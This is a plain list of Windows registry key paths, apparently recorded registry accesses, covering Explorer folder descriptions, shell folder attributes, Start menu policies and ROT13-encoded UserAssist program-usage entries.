                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\FolderTypeID

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\InitFolderHandler

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Common Programs

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Category

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Name

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\ParentFolder

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Description

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\RelativePath

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\ParsingName

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\InfoTip

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\LocalizedName

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Icon

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Security

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\StreamResource

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\StreamResourceType

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\LocalRedirectOnly

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Roamable

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\PreCreate

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Stream

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\PublishExpandedPath

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\Attributes

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\FolderTypeID

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{C4AA340D-F20F-4863-AFEF-F87EF2E6BA25}\InitFolderHandler

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Common Desktop

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Category

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Name

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\ParentFolder

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Description

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\RelativePath

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\ParsingName

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\InfoTip

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\LocalizedName

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Icon

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Security

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\StreamResource

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\StreamResourceType

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\LocalRedirectOnly

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Roamable

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\PreCreate

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Stream

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\PublishExpandedPath

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\Attributes

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\FolderTypeID

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{CAC52C1A-B53D-4EDC-92D7-6B2E8AC19434}\InitFolderHandler

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\SortOrderIndex

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Category

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Name

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\ParentFolder

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Description

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\RelativePath

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\ParsingName

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\InfoTip

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\LocalizedName

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Icon

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Security

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\StreamResource

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\StreamResourceType

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\LocalRedirectOnly

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Roamable

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\PreCreate

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Stream

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\PublishExpandedPath

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\Attributes

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\FolderTypeID

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}\InitFolderHandler

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\{9E3995AB-1F9C-4F13-B827-48B24B6C7174}

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Category

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Name

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\ParentFolder

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Description

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\RelativePath

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\ParsingName

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\InfoTip

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\LocalizedName

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Icon

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Security

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\StreamResource

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\StreamResourceType

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\LocalRedirectOnly

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Roamable

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\PreCreate

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Stream

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\PublishExpandedPath

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\Attributes

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\FolderTypeID

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}\InitFolderHandler

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\{52A4F021-7B75-48A9-9F6B-4B87A210BC8F}

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuPinnedList

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuPinnedList

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\FavoritesRemovedChanges

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\FavoritesChanges

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\ProgramsCacheSMP

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband\FavoritesChanges

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\ProgramsCacheTBP

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\ShellFolder\Attributes

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\ShellFolder\CallForAttributes

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\ShellFolder\RestrictedAttributes

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\ShellFolder\WantsFORDISPLAY

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\ShellFolder\HideFolderVerbs

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\ShellFolder\UseDropHandler

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\ShellFolder\WantsFORPARSING

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\ShellFolder\WantsParseDisplayName

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\ShellFolder\QueryForOverlay

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\ShellFolder\MapNetDriveVerbs

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\ShellFolder\QueryForInfoTip

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\ShellFolder\HideInWebView

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\ShellFolder\HideOnDesktopPerUser

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\ShellFolder\WantsAliasedNotifications

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\ShellFolder\WantsUniversalDelegate

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\ShellFolder\NoFileFolderJunction

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\ShellFolder\PinToNameSpaceTree

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\ShellFolder\HasNavigationEnum

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{1F3427C8-5C10-4210-AA03-2EE45287D668}

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\InProcServer32\(Default)

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F3427C8-5C10-4210-AA03-2EE45287D668}\InProcServer32\LoadWithoutCOM

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{1F3427C8-5C10-4210-AA03-2EE45287D668} {000214E6-0000-0000-C000-000000000046} 0xFFFF

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuMFUprogramsList

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuMFUprogramsList

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs

                    
                        HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_MinMFU

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInstrumentation

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Sversbk Cevingr Oebjfvat.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Zvpebfbsg BarQevir.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Pbzznaq Cebzcg.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\qvfcynlfjvgpu.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\pnyp.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.FgvpxlAbgrf

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\FavccvatGbby.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zfcnvag.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\kcfepuij.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JSF.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.ErzbgrQrfxgbc

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zntavsl.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.VagreargRkcybere.Qrsnhyg

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Abgrcnq.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{S38OS404-1Q43-42S2-9305-67QR0O28SP23}\rkcybere.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Hfref\hfre\Qbjaybnqf\aqc48-k86-k64-nyybf-rah.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JvaqbjfCbjreFuryy\i1.0\cbjrefuryy.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\jfpevcg.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\fyhv.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.PbagebyCnary

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\jhnhpyg.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\abgrcnq.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{N77S5Q77-2R2O-44P3-N6N2-NON601054N51}\Npprffbevrf\Jvaqbjf Rkcybere.yax

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.Furyy.EhaQvnybt

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.JVAJBEQ.RKR.15

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.SVEFGEHA.RKR.15

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{N3R10OON-P2N1-R0S3-7P97-5Q5521119O40}

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\jhncc.rkr

                    
                        HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\efgehv.rkr

